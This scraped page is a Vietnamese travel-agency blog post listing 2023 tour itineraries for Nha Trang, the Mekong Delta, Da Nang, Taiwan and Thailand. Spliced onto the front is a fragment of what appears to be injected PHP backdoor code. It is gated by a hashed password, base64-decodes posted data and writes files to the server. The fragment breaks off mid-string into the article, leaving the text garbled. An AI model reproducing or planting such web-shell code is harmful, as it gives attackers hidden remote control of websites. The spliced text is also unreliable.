function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour du lịch 2023 - CẬP NHẬT các tour du lịch mới nhất

Tour du lịch 2023 – CẬP NHẬT các tour du lịch mới nhất

18/01/2023 Đi Để Đến - Group

Những ngày Tết Nguyên Đán đang đến gần, chắc hẳn các tín đồ du lịch đang tất bật tìm kiếm cho mình tour du lịch 2023 phù hợp. Trong bài viết dưới đây, dideden.com xin được giới thiệu các tour du lịch 2023 mới nhất mà du khách có thể tham khảo. Đặc biệt, nếu bạn đang có dự định du lịch dịp Tết Quý Mão này thì đừng bỏ lỡ danh sách các tour du lịch và một vài lưu ý quan trọng khi đi tour. 

TOUR DU LỊCH 2023 TRONG NƯỚC

Tour du lịch 2023 trong nước là chủ đề chưa bao giờ hết hot. Các điểm đến du lịch tại Việt Nam luôn có sức hấp dẫn mạnh mẽ đối với du khách trong nước và quốc tế. Không chỉ sở hữu cảnh quan thiên nhiên đa dạng và tuyệt đẹp, Việt Nam còn là thiên đường ẩm thực đặc sắc mà bất kỳ du khách nào cũng muốn thưởng thức. 

Vậy trong năm 2023, du khách có thể đi du lịch tại những điểm đến nào tại Việt Nam. Cùng Đi Để Đến điểm danh một số tour du lịch 2023 trong nước nổi bật và chuẩn bị kế hoạch cho chuyến hành trình khám phá ngay thôi nào. 

1. Tour du lịch 2023 Nha Trang – Vịnh san hô 3 ngày 2 đêm 

Ngày 1: Bãi Dài – Làng Yến Mai Sinh – Vinwonders

Sáng: Đoàn du khách sau khi có mặt tại Cam Ranh, sẽ dùng bữa sáng tại khách sạn trước khi di chuyển đến các điểm tham quan. 

  • Bãi dài Nha Trang: Đây là điểm đến lý tưởng mà du khách không thể bỏ qua trong tour du lịch 2023. Tới đây, du khách chắc chắn sẽ vô cùng thích thú trước vẻ đẹp nên thơ và quyến rũ của bãi biển. Đúng như tên gọi, nơi đây sở hữu bãi biển rộng dài và bãi cát trắng mịn trải dài tới hàng chục km. Vì nằm cách khá xa trung tâm thành phố nên không gian tại đây tĩnh lặng, trầm mặc. Du khách có thể tự do đi dạo quanh bờ biển và tận hưởng bầu không khí trong lành, tránh xa những ồn ào của phố thị. 
  • Khu tưởng niệm chiến sĩ Gạc Ma: Nơi đây là địa điểm tâm linh nổi tiếng tại Cam Ranh được xây dựng tại huyện Cam Lâm nhằm ghi nhớ công lao của các chiến sĩ hải quân đã hy sinh khi thực hiện nhiệm vụ bảo vệ Tổ quốc trên đảo Gạc Ma. Vì vậy, du khách có thể ghé qua đây để thắp nén nhang tưởng niệm những vị anh hùng của dân tộc. 
tour du lich 2023 - Bai Dai

Bãi Dài Nha Trang với nước biển trong xanh. Nguồn sưu tầm

Chiều: Sau khi trở lại thành phố biển Nha Trang nghỉ ngơi và thưởng thức bữa trưa tại nhà hàng, du khách có thể lựa chọn đi đến một trong số những địa điểm được gợi ý như sau:

  • Vinwonders: Tour du lịch 2023 tới Nha Trang tại Vinwonders với các hoạt động trải nghiệm và vui chơi vô cùng hấp dẫn. Khu vui chơi giải trí trong nhà tại Vinwonders có thể kể đến như xe điện đụng, triển lãm tranh nghệ thuật, xem phim 4D,… Bên cạnh đó, du khách có thể tắm biển tại bãi biển nhân tạo và bể bơi dành cho trẻ em. Vinwonders được coi là địa điểm được các gia đình có trẻ nhỏ yêu thích. 
  • Làng Yến Mai sinh Nha Trang: Đây là điểm dừng chân thú vị tại Nha Trang mà du khách nhất định phải ghé qua. Tại đây, du khách sẽ được check in sống ảo tại góc phố ô với background là bức tường màu sắc, chiêm ngưỡng mô hình sinh động của hang động chim Yến,… và còn rất nhiều hoạt động hấp dẫn khác đang chờ bạn khám phá. 

Tối: Thành phố Nha Trang về đêm vô cùng xinh đẹp. Khi đi tour du lịch 2023 tại Nha Trang, du khách không những được tận hưởng không khí mát lành của biển cả mà còn được khám phá các hoạt động vui chơi về đêm tại các khu chợ sầm uất. Du khách có thể thỏa thích mua sắm và hòa mình vào dòng người náo nhiệt tại thành phố Nha Trang. Chắc chắn chuyến đi của bạn sẽ thêm phần đáng nhớ. 

>>> Xem thêm: Tour du lịch tết 2023 giá rẻ – Bí kíp săn tour TRỌN GÓI

Ngày 2: Vịnh san hô – Tắm bùn khoáng nóng

Sáng: Vào ngày thứ hai của tour du lịch 2023 tại Nha Trang, du khách tiếp tục tìm hiểu về cuộc sống sinh hoạt bình dị của ngư dân khi tham quan vịnh san hô. Du khách sẽ di chuyển bằng cano ra tới vịnh và tham quan các bè hải sản của người dân. Ngoài ra, khi ra tới vịnh, du khách có thể trải nghiệm các dịch vụ du lịch khác như tắm biển, tắm nắng, lặn ngắm san hô,… 

tour du lich 2023 - vinh san ho

Du khách thích thú lặn ngắm vẻ đẹp dưới đáy biển. Nguồn sưu tầm

Chiều: Đoàn du khách trở về đất liền và tự do trải nghiệm dịch vụ tắm bùn khoáng nóng. Du khách có thể lựa chọn tắm bùn trong bồn gỗ hoặc tắm khoáng tập thể với mức giá vừa với túi tiền. 

Tối: Sau khi dùng bữa tối, du khách sẽ tự do vui chơi tại thành phố Nha Trang.

Ngày 3: Chợ đầm

Du khách thưởng thức bữa sáng và làm thủ tục trả phòng. Xe của công ty du lịch sẽ đưa du khách tới chợ đầm để mua sắm các loại đặc sản Nha Trang về làm quà. Sau đó, đoàn sẽ khởi hành trở về sân bay quốc nội đưa du khách trở lại Hà Nội/ thành phố Hồ Chí Minh. 

>>> Xem thêm: Tour du lịch Nha Trang dịp Tết Nguyên Đán 2023

2. Tour du lịch Cần Thơ – Sóc Trăng – Bạc Liêu – Cà Mau 4 ngày 3 đêm

Ngày 1: Cần Thơ – Khu du lịch Mỹ Khánh – Cà Mau

Sáng: Xe của đoàn du lịch sẽ đón du khách tại điểm đã hẹn trước và bắt đầu hành trình tour du lịch 2023 Cần Thơ – Sóc Trăng – Bạc Liêu – Cà Mau 4 ngày 3 đêm. Điểm dừng chân đầu tiên là khu du lịch Mỹ Khánh, du khách sẽ dùng bữa trưa thật ấm cúng tại đây với các món ăn đặc sản của miền Tây có thể kể đến như cá nướng trui, mắm kho bông súng trắng, Ba khía, bánh xèo,… 

Sau khi nghỉ trưa, hướng dẫn viên sẽ đưa du khách đi tham quan khu du lịch Mỹ Khánh. Nơi đây có các điểm tham quan vô cùng thú vị mà du khách không thể bỏ lỡ như khu vui chơi giải trí với các trò chơi dưới nước hấp dẫn như đạp thiên nga, bơi xuồng, ô tô nước, xe đạp nước, đi cầu dây,… Ngoài ra, du khách còn được thưởng thức các tiết mục văn nghệ vô cùng đặc sắc từ các loài động vật như đua chó, đua heo, xiếc khỉ,… 

tour du lich 2023 - khu du lich My Khanh

Không gian thoáng đãng, trong lành tại khu du lịch Mỹ Khánh. Nguồn sưu tầm

Chiều – Tối: Vào buổi chiều, du khách trở lại Cà Mau và nghỉ ngơi, dùng bữa tại khách sạn. 

>>> Xem thêm: Tour du lịch khám phá An Giang dịp Tết ÂL 2023 (2N1Đ)

Ngày 2: Cà Mau – Đất Mũi – Bạc Liêu

Sáng: Du khách khởi hành tới tham quan công viên văn hóa mũi Cà Mau nằm trong khuôn viên của khu dự trữ sinh quyển thế giới. Tới đây, du khách có thể lên Đài quan sát để chiêm ngưỡng vẻ đẹp mây trời bao la, rừng vàng biển bạc và cảnh mặt trời mọc lặn trên biển. Đặt chân tới đây, bất kỳ du khách nào cũng đều mong muốn sẽ check in những tấm hình thật đẹp với con tàu vươn ra biển, là biểu tượng của mũi Cà Mau. 

tour du lich 2023 - cong vien van hoa Ca Mau

Du khách check in tại Đài quan sát Mũi Cà Mau. Nguồn sưu tầm

Chiều: Đoàn du khách quay trở lại Bạc Liêu, tham quan tại một số địa điểm khác như:

  • Nhà công tử Bạc Liêu được xây dựng theo lối kiến trúc của Pháp. Đây được coi là ngôi nhà bề thế bậc nhất tại Nam Kỳ vào đầu thế kỷ XX. Ngoài việc tham quan các hiện vật, du khách còn được nghe kể chuyện về công tử giàu nhất thời bấy giờ. 
  • Nhà thờ Cha Diệp Hộ Phòng là địa điểm tín ngưỡng thu hút đông đảo khách du lịch và các tín đồ tới ghé thăm hàng năm. Câu chuyện truyền cảm hứng về cuộc đời của linh mục Trương Bửu Diệp hy sinh cứu giáo dân khiến nơi đây trở thành địa điểm được nhiều người tôn thờ, kính trọng. 

Tối: Du khách tự do vui chơi tại quảng trường Hùng Vương và thưởng thức ẩm thực độc đáo tại chợ đêm Bạc Liêu như bánh tằm, lẩu mắm, bún nước lèo,…

Ngày 3: Bạc Liêu – Sóc Trăng – Cần Thơ

Sáng: Tour du lịch 2023 Cần Thơ đưa du khách đến tham quan Sóc Trăng, khám phá nét kiến trúc đặc sắc tại các ngôi chùa.

  • Chùa Som Rong nổi bật với tượng Phật cao 22m và dài 63m, là một trong những tượng phật lớn nhất tại Việt Nam.
  • Chùa Dơi với cái tên vô cùng đặc biệt bởi đây là ngôi nhà của bầy dơi. Nơi đây thờ Phật Thích Ca và là không gian văn hóa của dân tộc Khmer tại Sóc Trăng. 

Chiều – Tối: Du khách tiếp tục di chuyển tới Cần Thơ và đến bến Ninh Kiều, thưởng ngoạn cảnh đẹp trên sông Hậu. Thưởng thức bữa tối trên du thuyền với các tiết mục nghệ thuật Đờn Ca Tài Tử trữ tình chắc chắn là một trong trải nghiệm hấp dẫn mà du khách không thể bỏ qua. 

>>> Xem thêm: Tour Nhật Bản từ Hà Nội – Tour du lịch trọn gói năm 2023

Ngày 4: Chợ nổi Cái Răng – Cù Lao Thới Sơn

Sáng: Du khách sẽ có chuyến đi ghé thăm chợ nổi Cái Răng – khu chợ nổi tấp nập, đông đúc nhất tại Cần Thơ. Tham quan chợ nổi là cơ hội để du khách cảm nhận rõ hơn về cuộc sống của người dân tại miền sông nước. Từ rất sớm, người dân Cần Thơ đã có mặt tại chợ nổi để bày bán hàng hóa với đa dạng các loại đặc sản. Du khách nên tới đây vào khoảng thời gian từ 5 rưỡi đến 8 giờ sáng để thưởng thức bữa sáng nóng hổi tại các ghe thuyền. 

tour du lich 2023 - cho noi

Người dân miền Tây buôn bán hàng hóa từ sớm. Nguồn sưu tầm

Chiều: Tour du lịch 2023 Cần Thơ – Sóc Trăng – Bạc Liêu – Cà Mau 4 ngày 3 đêm kết thúc với chuyến tham quan tại Cù Lao Thới Sơn. Đoàn du khách sẽ dạo chơi và check in tại vườn cây ăn trái, tham quan trại nuôi ong trước khi trở về thành phố Hồ Chí Minh/ Hà Nội.

3. Tour du lịch 2023 Đà Nẵng – Cù Lao Chàm – Bà Nà Hills 4 ngày 3 đêm

Ngày 1: Đà Nẵng – Sơn Trà – Biển Mỹ Khê

Sáng: Du khách bắt đầu tour du lịch 2023 Đà Nẵng với chuyến khởi hành tới bán đảo Sơn Trà. Tới đây du khách sẽ được ngắm toàn cảnh thành phố Đà Nẵng từ xa, hành hương chiêm bái tại chùa Linh Ứng và thưởng ngoạn cảnh quan thiên nhiên tại một trong những hòn đảo quyến rũ nhất tại Việt Nam. 

Chiều – Tối: Du khách vui chơi, tắm biển tự do tại bãi biển Mỹ Khê và dùng bữa tối tại nhà hàng. 

Ngày 2: Đà Nẵng – Cù Lao Chàm – phố cổ Hội An

Sáng: Đoàn du khách sẽ ngồi tàu Cao Tốc tới Cù Lao Chàm và dừng chân tham quan tại một số địa điểm như Chùa Hải Tạng, khu bảo tồn biển, Âu thuyền. Đoàn nghỉ ngơi và thưởng thức hải sản tại nhà hàng trên đảo.

tour du lich 2023 - Cu Lao Cham

Thả dáng cực xinh tại Cù Lao Chàm. Nguồn sưu tầm

Chiều: Du khách tiếp tục hành trình tour du lịch 2023 tại Đà Nẵng tới phố cổ Hội An. Một số hoạt động thú vị mà du khách không thể bỏ lỡ khi tới đây có thể kể đến như:

  • Mua sắm các mặt hàng lưu niệm
  • Check in tại bảo tàng văn hóa Sa Huỳnh
  • Thưởng thức các món ăn đặc sản tại phố cổ như mì Quảng, cơm gà, bánh mì Hội An,…

Sau đó, đoàn sẽ trở về Đà Nẵng và nghỉ đêm tại khách sạn.

>>> Xem thêm: Tour du lịch Thái lan trọn gói 2023 hấp dẫn đáng để thử

Ngày 3: Bà Nà Hills – Bãi biển Mỹ Khê

Sáng: Đoàn du khách sẽ được dẫn tới tham quan tại khu du lịch Bà Nà Hills và trải nghiệm một ngày thật thú vị với các hoạt động vui chơi tại đây. Một số điểm đến mà du khách nhất định phải ghé qua khi tới Bà Nà Hills:

  • Chùa Linh Ứng
  • Khu chuồng ngựa
  • Thích Ca Phật Đài
  • Khu vui chơi giải trí trong nhà

Chiều: Xe du lịch đưa du khách trở lại Đà Nẵng theo tuyến đường Nguyễn Tất Thành. Du khách sẽ có cơ hội được ngắm nhìn vẻ đẹp của cầu treo Thuận Phước, bãi biển Thanh Bình, bãi biển Red Beach,…

Ngày 4: Mua sắm – Trở về Hà Nội/ thành phố Hồ Chí Minh

Sau bữa sáng, du khách sẽ đi mua sắm đặc sản địa phương tại chợ Hàn. Ngoài ra, du khách còn được ghé qua một số điểm đến hấp dẫn khác tại Đà Nẵng như cầu tình yêu, nhà thờ Con gà,… trước khi trở về Hà Nội/ thành phố Hồ Chí Minh kết thúc tour du lịch 2023 4 ngày 3 đêm tại Đà Nẵng. 

>>> Xem thêm: Tour Thái Lan giá rẻ 2023 – Tổng hợp kinh nghiệm du lịch A-Z

TOUR DU LỊCH 2023 NƯỚC NGOÀI

1. Tour du lịch Đài Loan 5 ngày 4 đêm

Ngày 1: Đào Viên – Đài Trung (du khách làm thủ tục nhập cảnh tại sân bay vào Đài Loan và di chuyển tới Đào Viên/ Đào Trung để nghỉ ngơi)

Ngày 2: Đài Trung – Cao Hùng: Đoàn du khách di chuyển và tham quan tại một số địa điểm du lịch như:

  • Đền Văn Võ
  • Làng dân tộc Thao và đặc sản Linh Chi
  • Tham quan Nhật Nguyệt Đàm
tour du lich 2023 - Dai Trung

Thành phố Đài Trung hiện đại, rực rỡ ánh đèn. Nguồn sưu tầm

Ngày 3: Cao Hùng – Đài Trung: Sau khi dùng bữa sáng, du khách tiếp tục tour du lịch 2023 Đài Loan tới tham quan tại các điểm đến như:

  • Chùa Phật Quang
  • Đầm Liên Trì, Long Hổ Tháp, xuân Thu Các
  • Chợ đêm Phùng Giáp

Ngày 4: Đài Trung – Đài Bắc

Du khách khởi hành tới Đài Bắc tham quan và thưởng thức các loại đặc sản tại một số địa điểm như công viên địa chất Dã Liễu, Trung tâm Miễn Thuế, Phố cổ Thập Phần,… Vào buổi tối, du khách có thể tới vui chơi tại trung tâm thương mại Tòa nhà Taipei 101 tầng. 

Ngày 5: Đài Bắc – Đào Viên 

Sau khi trả phòng khách sạn, đoàn tham quan di chuyển tới quảng trường tự do, check in bên ngoài phủ Tổng Thống, cửa hàng Tỳ Hưu,… Du khách sẽ trở lại Việt Nam sau khi dùng bữa tối và mua sắm tại phố đi bộ Ximen. 

>>> Xem thêm: Tour du lịch Singapore Tết 2023: Khám phá quốc đảo xinh đẹp

2. Tour du lịch Thái Lan 5 ngày 4 đêm

Ngày 1: Hà Nội – BangKok – Pattaya: Điểm đến đầu tiên trong tour du lịch 2023 tại Thái Lan là chùa cổ Wat Phra Yai. Đây được coi là một trong những điểm đến tâm linh hấp dẫn tọa lạc trên đỉnh đồi Pratumnak. Sau khi tham quan, du khách sẽ quay về khách sạn và thưởng thức bữa tối tại nhà hàng ở Pattaya. 

Ngày 2: Đảo Coral: Xe và hướng dẫn viên đưa ra khách ra đảo Coral. Tới đây, du khách có thể tham gia các hoạt động vui chơi trên biển như mô tô nước, lặn biển, tàu Chuối,… 

tour du lich 2023 - đảo Coral

Đảo Coral tuyệt đẹp với góc máy chụp từ trên cao. Nguồn sưu tầm

Ngày 3: Pattaya – Muang Boran: Xe du lịch đưa du khách tới nông trại nuôi ong và tìm hiểu về các sản phẩm từ ong. Sau đó, đoàn sẽ được tới tham quan tại Muang Boran, được xem là Thái Lan thu nhỏ. Nơi đây nổi tiếng với công trình kiến trúc độc đáo, mô phỏng lại đất nước Thái Lan chỉ với một chuyến đi. 

Ngày 4: BangKok – Cung điện Grand Palace: Tour du lịch 2023 tại Thái Lan đưa du khách tới tham quan tại cung điện Hoàng gia. Đây là quần thể kiến trúc đồ sộ với công trình được xây dựng và thiết kế tỉ mỉ được chia làm 4 khu vực chính:

  • Chùa Ngọc Phật
  • Khu vực tòa nhà sử dụng làm văn phòng
  • Khu vực tòa nhà của vua
  • Khu vực tòa nhà là nơi ở của vợ vua
tour du lich 2023 - cung dien Grand Palace

Cung điện Grand Palace – Niềm tự hào của người Thái. Nguồn sưu tầm

>>> Xem thêm: Gợi ý các tour du lịch Hàn Quốc 2023 từ TPHCM theo bốn mùa

LƯU Ý QUAN TRỌNG DÀNH CHO DU KHÁCH KHI ĐI TOUR DU LỊCH 2023

Khi đi tour du lịch, du khách cần lưu ý một số thông tin quan trọng sau đây để có một chuyến đi trọn vẹn nhất. 

  • Nắm rõ lịch trình đi tour: Du khách hãy tìm hiểu thật kỹ về chương trình đi tour du lịch và đặc biệt cần chú ý về thời gian tham quan các điểm đến để tránh bị bỏ lỡ lịch trình tham quan. 
  • Chuẩn bị đầy đủ hành lý: Nếu bạn có chuyến đi tour du lịch dài ngày, bạn cần chuẩn bị đầy đủ vali hành lý bao gồm giấy tờ tùy thân, trang phục, đồ dùng cá nhân,… 
  • Đề phòng bị lạc khi đi tách đoàn: Để tránh bị lạc trong quá trình di chuyển tại đoàn, du khách có thể lưu lại số điện thoại của hướng dẫn viên du lịch và các khách du lịch khác trong trường hợp cần sự giúp đỡ. 

>>> Xem thêm: Tour du lịch Trung Quốc 7N6Đ giá tốt tháng 1/2023

Hy vọng sau khi đọc bài viết của dideden.com, các bạn đã kịp lưu lại những thông tin hữu ích về tour du lịch 2023 để chuẩn bị cho chuyến hành trình sắp tới. Nếu bạn có thêm băn khoăn về thông tin tour du lịch 2023 trọn gói thì hãy gọi ngay vào số hotline 1900 3398 để được hỗ trợ và tư vấn chi tiết nhé! 

Nhận tư vấn miễn phí

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]